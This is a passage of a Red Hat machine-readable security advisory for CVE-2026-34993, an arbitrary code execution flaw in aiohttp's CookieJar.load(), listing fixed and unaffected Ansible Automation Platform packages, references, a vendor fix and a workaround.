"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484099"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in AIOHTTP, a Python asynchronous HTTP framework, due to potential arbitrary code execution. The vulnerability arises when applications load untrusted input into the `CookieJar.load()` function. Exploitation requires an application to be configured to process attacker-controlled files, which is not a default or common scenario in most Red Hat product deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "RHBZ#2484099",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484099"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34993"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00",
"url": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8"
}
],
"release_date": "2026-06-02T18:29:15.847000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "Applications using AIOHTTP that are configured to load untrusted files via the `CookieJar.load()` function should implement input sanitization prior to loading. This prevents the injection of malicious code.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
